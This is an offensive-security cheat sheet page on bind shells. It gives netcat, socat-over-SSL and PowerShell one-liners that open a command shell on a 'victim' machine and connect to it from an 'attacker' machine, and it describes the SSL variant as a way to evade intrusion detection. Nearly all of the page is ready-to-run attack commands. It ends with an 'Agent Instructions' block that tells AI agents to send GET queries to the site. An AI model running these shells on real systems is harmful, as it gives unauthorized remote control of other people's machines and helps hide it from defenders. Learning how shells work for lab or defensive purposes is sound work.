# Bind Shell ## Netcat On the victim machine, run the following command: ```bash victim> $ nc -nlvp 4444 -e /bin/bash ``` On the attacker side, connect to the victim with this command : ```bash attacker> $ nc -nv 4444 ``` ## Socat To add encryption to a bind shell, rely on Secure Socket Layer certificates. This level of encryption will assist in evading intrusion detection systems (IDS) and will help hide the sensitive data transceived. First, create a self-signed certificate: ```bash openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt cat bind_shell.key bind_shell.crt > bind_shell.pem ``` Now that the key and certificate have been generated, convert them to a format socat will accept. To do so, combine both the **bind\_shell.key** and **bind\_shell.crt** files into a single **.pem** file before creating the encrypted socat listener. ```bash victim> $ cat bind_shell.key bind_shell.crt > bind_shell.pem victim> $ sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash ``` Now, connect attacker's computer to the victim's bind shell. ```bash attacker> $ socat - OPENSSL:10.11.0.4:443,verify=0 ``` ## PowerShell On the victim command prompt, run the following command: {% code overflow="wrap" %} ```powershell powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()" ``` {% endcode %} Then, on the attacker machine, connect it using netcat: ```bash attacker> $ nc -nv 443 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gitbook.kaizoku.eu/offensive-security/shells-and-stuffs/bind-shell.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.